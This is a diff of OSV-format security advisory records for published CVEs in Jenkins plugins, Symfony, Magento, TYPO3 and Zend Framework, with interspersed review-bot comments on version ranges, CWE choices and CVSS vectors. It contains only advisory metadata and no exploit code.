@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wwrr-4jp4-58wg", + "modified": "2024-01-30T21:11:17Z", + "published": "2022-05-24T17:03:48Z", + "aliases": [ + "CVE-2019-16569" + ], + "summary": "CSRF vulnerability in Jenkins Mantis Plugin ", + "details": "A cross-site request forgery vulnerability in Jenkins Mantis Plugin 0.26 and earlier allows attackers to connect to an attacker-specified web server using attacker-specified credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:mantis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.26" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16569" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1603" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:11:06Z", + "nvd_published_at": "2019-12-17T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json b/advisories/github-reviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json new file mode 100644 index 0000000000000..44fb62dc91bcb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json 
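Review bot: The `summary` value `"CSRF vulnerability in Jenkins Mantis Plugin "` carries a trailing space, which will surface verbatim in titles and defeat exact-match deduplication against other databases; trim it. Ending the range with `last_affected: "0.26"` and no `fixed` event is the right encoding when no fixed release exists, but it means consumers keep flagging every later release until the record is revisited — adding `"database_specific": { "last_known_affected_version_range": "<= 0.26" }` to the affected entry makes that intent explicit, as the neighbouring Jenkins records in this change do.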
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxj2-qc9p-65r3", + "modified": "2024-01-30T22:27:01Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003026" + ], + "summary": "Jenkins Mattermost Notification Plugin vulnerable to SSRF", + "details": "A server-side request forgery vulnerability exists in Jenkins Mattermost Notification Plugin 2.6.2 and earlier in MattermostNotifier.java that allows attackers with Overall/Read permission to have Jenkins connect to an attacker-specified Mattermost server and room and send a message.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:mattermost" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.6.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003026" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-985" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107295" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:27:01Z", + "nvd_published_at": "2019-02-20T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-x3cf-w64x-4cp2/GHSA-x3cf-w64x-4cp2.json b/advisories/github-reviewed/2022/05/GHSA-x3cf-w64x-4cp2/GHSA-x3cf-w64x-4cp2.json index f51ed21237738..5d47d611c3b70 100644 --- a/advisories/github-reviewed/2022/05/GHSA-x3cf-w64x-4cp2/GHSA-x3cf-w64x-4cp2.json +++ b/advisories/github-reviewed/2022/05/GHSA-x3cf-w64x-4cp2/GHSA-x3cf-w64x-4cp2.json 
@@ -128,6 +128,120 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.50" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.49" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.4.20" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.1" + } + ] + } + ] } ], "references": [ @@ -139,6 +253,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/b65e6f1a47b68f2713b60cdac9cc3a4af62a2d1c" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/form/CVE-2018-19789.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-19789.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" 
@@ -167,6 +289,10 @@ "type": "WEB", "url": "https://symfony.com/blog/cve-2018-19789-disclosure-of-uploaded-files-full-path" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2018-19789" + }, { "type": "WEB", "url": "https://web.archive.org/web/20210124224817/http://www.securityfocus.com/bid/106249" diff --git a/advisories/github-reviewed/2022/05/GHSA-x5q5-6wvf-2fpq/GHSA-x5q5-6wvf-2fpq.json b/advisories/github-reviewed/2022/05/GHSA-x5q5-6wvf-2fpq/GHSA-x5q5-6wvf-2fpq.json index ebd459fccf9ff..d928dff6ecb1d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-x5q5-6wvf-2fpq/GHSA-x5q5-6wvf-2fpq.json +++ b/advisories/github-reviewed/2022/05/GHSA-x5q5-6wvf-2fpq/GHSA-x5q5-6wvf-2fpq.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8124" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8124.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json b/advisories/github-reviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json new file mode 100644 index 0000000000000..c79315f7806e5 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x654-4wjh-74q6", + "modified": "2024-01-30T22:46:58Z", + "published": "2022-05-13T01:36:51Z", + "aliases": [ + "CVE-2017-2648" + ], + "summary": "Jenkins SSH Build Agents Plugin did not verify host keys", + "details": "It was found that jenkins-ssh-slaves-plugin before version 1.15 did not perform host key verification, thereby enabling Man-in-the-Middle attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:ssh-slaves" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2648" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2648" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-03-20/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/96985" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:46:58Z", + "nvd_published_at": "2018-07-27T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-x72m-p4qc-p7rv/GHSA-x72m-p4qc-p7rv.json b/advisories/github-reviewed/2022/05/GHSA-x72m-p4qc-p7rv/GHSA-x72m-p4qc-p7rv.json index 9289e3b06e443..e02ef83ea1f4e 100644 --- a/advisories/github-reviewed/2022/05/GHSA-x72m-p4qc-p7rv/GHSA-x72m-p4qc-p7rv.json +++ b/advisories/github-reviewed/2022/05/GHSA-x72m-p4qc-p7rv/GHSA-x72m-p4qc-p7rv.json 
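Review bot: `CWE-295` (improper certificate validation) is a poor fit for missing SSH host-key verification — no certificate is involved; `CWE-322` (key exchange without entity authentication) describes a client that never authenticates the server's host key, so I would use `"cwe_ids": ["CWE-322"]`. The `fixed: "1.15"` bound also deserves a caveat in `details`: if, as the 1.15 release appears to have done (confirm against the linked Jenkins advisory), existing agent configurations were migrated to a non-verifying strategy so that upgrades would not break them, then merely running ≥1.15 does not close the MITM exposure until each agent is switched to a verifying strategy. A sentence such as "After upgrading, a verifying Host Key Verification Strategy must be selected for each SSH agent" would stop readers from treating the version bump as the whole fix.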
@@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8109" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8109.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json b/advisories/github-reviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json new file mode 100644 index 0000000000000..8ad5babc943cf --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x7qf-qh3r-mx22", + "modified": "2024-01-30T22:36:41Z", + "published": "2022-05-14T03:46:09Z", + "aliases": [ + "CVE-2018-1000010" + ], + "summary": "XXE vulnerability in Jenkins DRY Plugin", + "details": "Jenkins DRY Plugin 2.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:dry" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.50" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.49" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000010" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:36:41Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json b/advisories/github-reviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json new file mode 100644 index 0000000000000..7fee524ab01a4 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json 
@@ -0,0 +1,140 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgc2-q928-27wv", + "modified": "2024-02-07T23:31:04Z", + "published": "2022-05-17T01:55:53Z", + "aliases": [ + "CVE-2010-5104" + ], + "summary": "TYPO3 Sensitive Information Disclosure via escapeStrForLike method", + "details": "The escapeStrForLike method in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 does not properly escape input when the MySQL database is set to sql_mode NO_BACKSLASH_ESCAPES, which allows remote attackers to obtain sensitive information via wildcard characters in a LIKE query.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5104" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/9eb4be4ccf10e6959699b9cce375d48697f06cba" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/e8c32474a5571336681243465f42090cf056054f" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/fcabd2fc2aa557c94805f7505277185c4abb68ab" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64185" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/core" + }, + { + "type": "WEB", + "url": 
"https://web.archive.org/web/20101219052359/http://secunia.com/advisories/35770" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111025222220/http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-022/" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111223211753/http://www.securityfocus.com/bid/45470" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:31:03Z", + "nvd_published_at": "2012-05-21T20:55:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xgcp-59g2-wm8g/GHSA-xgcp-59g2-wm8g.json b/advisories/github-reviewed/2022/05/GHSA-xgcp-59g2-wm8g/GHSA-xgcp-59g2-wm8g.json index 700be00405dfb..1b034187e388a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-xgcp-59g2-wm8g/GHSA-xgcp-59g2-wm8g.json +++ b/advisories/github-reviewed/2022/05/GHSA-xgcp-59g2-wm8g/GHSA-xgcp-59g2-wm8g.json 
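Review bot: The three affected entries map TYPO3 4.2.x/4.3.x/4.4.x onto the Packagist package `typo3/cms-core`, but as far as I know that package only has releases from the 8.x line onward (and `typo3/cms` from 6.2), so no Packagist version will ever satisfy `4.2.0 ≤ v < 4.2.16` and the ranges are effectively unresolvable — confirm against Packagist and either drop the mapping or say in `details` that the affected releases predate Composer distribution. `severity` is an empty array while `database_specific.severity` is `"MODERATE"`, so the rating has no vector behind it; add a CVSS vector or state that the severity is an estimate. `CWE-200` also captures only the outcome; the root cause is an escaping function that ignores `NO_BACKSLASH_ESCAPES`, i.e. `CWE-89`, and `"cwe_ids": ["CWE-89", "CWE-200"]` keeps the record findable under injection.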
@@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8136" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8136.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json b/advisories/github-reviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json new file mode 100644 index 0000000000000..0c5e1cccd28d7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgmh-rvpw-6498", + "modified": "2024-01-30T23:18:27Z", + "published": "2022-05-14T03:33:40Z", + "aliases": [ + "CVE-2018-1000108" + ], + "summary": "Reflected cross-site-scripting vulnerability in report URL of Jenkins CppNCSS Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins CppNCSS Plugin 1.1 and earlier in AbstractProjectAction/index.jelly that allow an attacker to craft links to Jenkins URLs that run arbitrary JavaScript in the user's browser when accessed.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:cppncss" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000108" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-712" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:18:27Z", + "nvd_published_at": "2018-03-13T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json b/advisories/github-reviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json new file mode 100644 index 0000000000000..a3d5c3766bf44 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj4w-r6gr-x5qm", + "modified": "2024-01-30T21:19:03Z", + "published": "2022-05-24T22:00:44Z", + "aliases": [ + "CVE-2019-10407" + ], + "summary": "Project Inheritance Plugin showed secret environment variables defined in Mask Passwords Plugin ", + "details": "Jenkins Project Inheritance Plugin 19.08.02 and earlier displayed a list of environment variables passed to a build without masking sensitive variables contributed by the Mask Passwords Plugin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins:project-inheritance" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "19.08.02" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 19.08.01" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10407" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-351" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:19:03Z", + "nvd_published_at": "2019-09-25T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json b/advisories/github-reviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json new file mode 100644 index 0000000000000..9e4ba3a2b2e43 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json 
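Review bot: `details` says `19.08.02 and earlier` is affected, yet the range marks `19.08.02` as the `fixed` event and `last_known_affected_version_range` says `<= 19.08.01` — one of the two is wrong, and if the text is right the record tells scanners that an affected release is safe. The linked Jenkins SECURITY-351 advisory and oss-security post should settle it; unless they show a 19.08.02 release containing the fix, the range should end with `"last_affected": "19.08.02"` and the hint should read `"last_known_affected_version_range": "<= 19.08.02"`.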
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj63-95xc-jc4v", + "modified": "2024-01-30T21:20:20Z", + "published": "2022-05-24T16:52:46Z", + "aliases": [ + "CVE-2019-10385" + ], + "summary": "Jenkins eggplant-plugin Plugin stores credentials in plain text ", + "details": "Jenkins eggPlant Plugin 2.2 and earlier stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:eggplant-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10385" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1430" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-834/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:20:20Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json b/advisories/github-reviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json new file mode 100644 index 0000000000000..4f953df43793a --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json 
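Review bot: The `summary` reads `"Jenkins eggplant-plugin Plugin stores credentials in plain text "` — "Plugin" is doubled and the string ends in a trailing space; `"Jenkins eggPlant Plugin stores credentials in plain text"` matches the product name used in `details`. Ending the range with `last_affected: "2.2"` is correct since no fix is referenced, but a `"last_known_affected_version_range": "<= 2.2"` under `database_specific` would make the no-fix state explicit, as the neighbouring Jenkins records do.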
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xp44-8vwr-xwmv", + "modified": "2024-01-30T21:18:20Z", + "published": "2022-05-24T22:00:44Z", + "aliases": [ + "CVE-2019-10428" + ], + "summary": "Jenkins Aqua Security Scanner Plugin showed plain text password in configuration form ", + "details": "Jenkins Aqua Security Scanner Plugin 3.0.17 and earlier transmitted configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aqua-security-scanner" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.18" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.0.17" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10428" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1508" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:18:20Z", + "nvd_published_at": "2019-09-25T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xp8p-9rq5-4wgv/GHSA-xp8p-9rq5-4wgv.json b/advisories/github-reviewed/2022/05/GHSA-xp8p-9rq5-4wgv/GHSA-xp8p-9rq5-4wgv.json index 4da44729b5f8d..ffcc75512fc6a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-xp8p-9rq5-4wgv/GHSA-xp8p-9rq5-4wgv.json +++ b/advisories/github-reviewed/2022/05/GHSA-xp8p-9rq5-4wgv/GHSA-xp8p-9rq5-4wgv.json 
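Review bot: `PR:N` in `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` does not match the exposure `details` describes — the credentials are rendered "as part of the global Jenkins configuration form", and viewing that form normally requires Overall/Administer, so an attacker must already hold high privileges (or be positioned to observe that page), which is `PR:H`, not an unauthenticated network attacker. With `PR:H` the base score falls well below the `HIGH` label assigned in `database_specific`. I would re-derive the vector from the linked SECURITY-1508 text rather than leave a 7.5 on what is, as far as the text shows, a password field rendered without masking.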
@@ -22,10 +22,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.0.0" }, { - "fixed": "1.12.14" + "fixed": "2.4.6" } ] } @@ -41,10 +41,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0.0" + "introduced": "2.5.0" }, { - "fixed": "2.4.6" + "fixed": "2.5.2" } ] } @@ -53,17 +53,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zendframework" + "name": "zendframework/zendframework1" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "2.5.0" + "introduced": "1.12.0" }, { - "fixed": "2.5.2" + "fixed": "1.12.14" } ] } @@ -79,7 +79,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.0.1" @@ -87,6 +87,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zendframework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.12.0" + }, + { + "fixed": "1.12.14" + } + ] + } + ] } ], "references": [ @@ -106,6 +125,22 @@ "type": "WEB", "url": "https://github.com/zendframework/zf1/commit/ff7edddf1410b44b5ead857c02698aad9f748d1b" }, + { + "type": "WEB", + "url": "https://framework.zend.com/security/advisory/ZF2015-06" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/CVE-2015-5161.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework1/CVE-2015-5161.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendxml/CVE-2015-5161.yaml" + }, { "type": "WEB", "url": "https://web.archive.org/web/20200228055156/http://www.securityfocus.com/bid/76177" @@ -145,6 +180,10 @@ { "type": "WEB", "url": "http://www.debian.org/security/2015/dsa-3340" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/76177" } ], "database_specific": { 
